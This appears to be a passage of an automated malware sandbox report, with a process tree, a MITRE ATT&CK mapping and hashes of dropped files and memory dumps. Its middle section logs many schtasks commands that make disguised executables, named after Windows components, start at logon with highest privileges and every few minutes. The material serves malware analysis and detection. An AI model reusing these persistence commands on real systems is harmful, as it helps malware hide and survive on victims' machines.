        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
        7⤵
        
        PID:4400
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
        7⤵
        
        PID:1372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
        7⤵
        
        PID:3132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
        7⤵
        
        PID:3744
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
        7⤵
        
        PID:4080
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2884 /prefetch:1
        7⤵
        
        PID:4448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
        7⤵
        
        PID:3676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 /prefetch:8
        7⤵
        
        PID:3536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 /prefetch:8
        7⤵
        
        PID:5156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
        7⤵
        
        PID:5168
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
        7⤵
        
        PID:5176
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
        7⤵
        
        PID:5488
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
        7⤵
        
        PID:5588
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2052 /prefetch:1
        7⤵
        
        PID:5900
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1649155961479591274,12332886569372096354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
        7⤵
        
        PID:1380
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\\826UXRAQMN.bat"
        6⤵
        
        PID:5144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Windows\SystemResources\Windows.UI.Cred\pris\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.Cred\pris\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Windows\SystemResources\Windows.UI.Cred\pris\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\System\uk-UA\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\uk-UA\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\System\uk-UA\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Multimedia Platform\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Multimedia Platform\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\All Users\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Videos\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1056

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4844

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4556

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4216

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e765f3d75e6b0e4a7119c8b14d47d8da

SHA1
cc9f7c7826c2e1a129e7d98884926076c3714fc0

SHA256
986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89

SHA512
a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
53bc70ecb115bdbabe67620c416fe9b3

SHA1
af66ec51a13a59639eaf54d62ff3b4f092bb2fc1

SHA256
b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771

SHA512
cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
64de8bdb2ff120955829e3a1418dc2c4

SHA1
29c7babfb192b2af31839bc94ffba84b51d5ce9f

SHA256
77683da9a519b29e6a43ce69f97c03d38d96a3531faccbdac44f78c85b8ef642

SHA512
fb3fb169588e9fb9b59efcbf22082ccca2e7828ff23ae7f02227fce9276fe9c9d8a90e8921a7fbe73adcb0b5f16f40cc6b267b41c1bacb82762003c90261300d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
046a427b81eac6eaafa2b788afec33eb

SHA1
1e7076631fbe0392664e9d4369f30b1f12d060b9

SHA256
d63c2df49bca9dd0ef897445f2e7b6955de3696a43e3adac578dd8ce30d6f174

SHA512
9bc09521f97651bb584b97d31ee0039e1f5d180f6460a5c1f9d666404cf1afb271b436334ed6c828d0a9a02a93fa98cbc0721aebef6a7b7de75c9309a77e61d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d7fa5eb7e55d2061c5eb5feb3e751747

SHA1
55881f14ba690482d3ee32d0bbde68e468e30b67

SHA256
bc35602bed39a577ebf18110f359c4fd99656014a31a7e9b479a682821e686e7

SHA512
97c8d4be0432a40ceff86bef92e485b345cac2868b796899c83cfefd67559c15180fbe3baa3365c947575adba471254a14a5d6900617edb5a22de244046a63fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
57a956640e89bb58988203d2000b1109

SHA1
7590513e0c17f3575019a84f87eb9ed462b4641a

SHA256
cb64c3d1c19b30d86c8cb902e537ab9d460b831f76feddbde8d402c4efd8c937

SHA512
daa75f343f2947e11ae453dc6f31ea17efcb1923a46d46b74ad57bf62f99bd9bdaefeb4fa7d434f23e27884146da32ce1d558fc526b7974652ea534427e908cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\156d791f-d957-410f-8431-07fe2f671013.vbs

Filesize
488B

MD5
955e896f5e1ce7d47654edabe106e944

SHA1
dbbb6c85d369a1db93bb4a33c8d58757cc4c5b63

SHA256
a44c8e782b3bc5373148f91d9a8cc81af30a9bd5e4435434f5f8f52ee6feec46

SHA512
39038ade5db986fec8fa067c95d9878c5aa6c4eede973e18420b30390ef7d951148b039d84585c90b5419cc72adcad2d2ad069f3267489f614e032a2c9e0ea0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5c387a69-95a7-4bae-8147-c492ed54406d.vbs

Filesize
712B

MD5
b59db00e099fed99ed801b1d04986164

SHA1
d24900b8ab19764453bc63e4151f91e2156a8d88

SHA256
b1e2fbcc1aaa3289e8e2e22589d4d4f028b479e5f3ce5651a4b1bc605c6e85e8

SHA512
be5193bc470af1c9e49503ad75ea07b31a465f7e19d5342bf2e1e1cd408f540156f9f5ec492e033c9a9cb05c26b0fd8b08561d3e7fccfcbbbb136c73c26abb1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\826UXRAQMN.bat

Filesize
44B

MD5
d22873a432ee310a81b55f9ed9076a35

SHA1
6634f60bd1c924a0c4161912a9671e2f55dee4ac

SHA256
8a4f4e4f942104f2a61a587767f560fe2cfce39eae69bf1b971ca0776ff2fd23

SHA512
31a0dd03ee4c113287a484425736d921f87ce705d5062d7f7af56d1a7539f9ef6e05904adb10ab162672c52e63df064c34b6f5d8bb431031735e042e186b6eae

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lqa4imde.ss0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\appdatacache\dCFBsC1L6qM.bat

Filesize
38B

MD5
7977082779294b53338d35e6c7667247

SHA1
7f19d6221c49cea9ddae8e8b5128a5dfff40c417

SHA256
19575525fc3784f7c187cb33338daf55d4aaea31d39b1a0ebac7889f52299e3f

SHA512
dee1ef75de510966021bba1065e475e4305c75295cce8c80c12375b7551a8b9ea7e09a3ee6a61a889914d119cc7474009fb1e99e84c6da7aab559e809c6ee061

Download Submit
C:\Users\Admin\AppData\Roaming\appdatacache\f7dEioSun.vbe

Filesize
207B

MD5
55a9cd6024ab021450e7d261f7e4a3ab

SHA1
23b62d0c37db6291cca3fd9684ac59a71ead7f63

SHA256
7ac6b9729703c4159fdd9a498a6e247ce28860a82ba96a50b9472d4325c3514e

SHA512
a1e55c2972d1d89310575fe1d6eae63a2d2eb61c9331c7846f8bc118c23148a77a22beb1261a1169b4e1249ae006708ad66b4e74892b68559e5a6aa4bf8f9064

Download Submit
C:\Users\Admin\AppData\Roaming\appdatacache\tempcache.exe

Filesize
4.6MB

MD5
151f8a030d8cc9658ac9997ea71ed900

SHA1
92660b8eab7d423a96eb17333f7dc1981f4df584

SHA256
c910067c4fa240336dcbb0a9cba40da5c3d7f99bde72bf9809d10eb186d8467b

SHA512
4364640891a4773a45d4c9a4892fbcbe67f52858ecd2fc58fea9d214e8af2531dfeddaa0ad9de0767464ac7e089a5ef2ebee383ee6868ed261513ce77aad14fd

Download Submit
C:\Windows\SystemResources\Windows.UI.Cred\pris\RCXA0B6.tmp

Filesize
4.6MB

MD5
5e10d250451d0f6b1ff5337c4bec69e0

SHA1
30bfbe5534078e5e011ce0099c017ef7e8b59481

SHA256
0004fd49c084ed6fade3ed92a9aa959fba61ce344caf943982924fbe6313bfe2

SHA512
f38eb77e18bce3f1d13d48de5c28128b15158faf18ba49234a5e1ba267401839cff1757ce776f31f0494ebce7a2cdde9456464d3d609472bd74f126bcc54a328

Download Submit
memory/2916-155-0x000002411E550000-0x000002411E572000-memory.dmp

Filesize
136KB

Download
memory/3492-261-0x000000001C6D0000-0x000000001C6E2000-memory.dmp

Filesize
72KB

Download
memory/3492-271-0x000000001E2C0000-0x000000001E482000-memory.dmp

Filesize
1.8MB

Download
memory/4772-24-0x000000001C2F0000-0x000000001C346000-memory.dmp

Filesize
344KB

Download
memory/4772-29-0x000000001C3A0000-0x000000001C3B2000-memory.dmp

Filesize
72KB

Download
memory/4772-39-0x000000001C650000-0x000000001C658000-memory.dmp

Filesize
32KB

Download
memory/4772-38-0x000000001C630000-0x000000001C63E000-memory.dmp

Filesize
56KB

Download
memory/4772-43-0x000000001C6A0000-0x000000001C6AA000-memory.dmp

Filesize
40KB

Download
memory/4772-44-0x000000001C6B0000-0x000000001C6BC000-memory.dmp

Filesize
48KB

Download
memory/4772-42-0x000000001C680000-0x000000001C688000-memory.dmp

Filesize
32KB

Download
memory/4772-41-0x000000001C670000-0x000000001C67C000-memory.dmp

Filesize
48KB

Download
memory/4772-37-0x000000001C520000-0x000000001C52A000-memory.dmp

Filesize
40KB

Download
memory/4772-36-0x000000001C510000-0x000000001C51C000-memory.dmp

Filesize
48KB

Download
memory/4772-35-0x000000001C500000-0x000000001C508000-memory.dmp

Filesize
32KB

Download
memory/4772-138-0x00007FFD99923000-0x00007FFD99925000-memory.dmp

Filesize
8KB

Download
memory/4772-32-0x000000001C3D0000-0x000000001C3D8000-memory.dmp

Filesize
32KB

Download
memory/4772-34-0x000000001C3F0000-0x000000001C3FC000-memory.dmp

Filesize
48KB

Download
memory/4772-33-0x000000001C3E0000-0x000000001C3EC000-memory.dmp

Filesize
48KB

Download
memory/4772-31-0x000000001C3C0000-0x000000001C3CC000-memory.dmp

Filesize
48KB

Download
memory/4772-30-0x000000001C8E0000-0x000000001CE08000-memory.dmp

Filesize
5.2MB

Download
memory/4772-40-0x000000001C660000-0x000000001C66E000-memory.dmp

Filesize
56KB

Download
memory/4772-28-0x000000001C390000-0x000000001C398000-memory.dmp

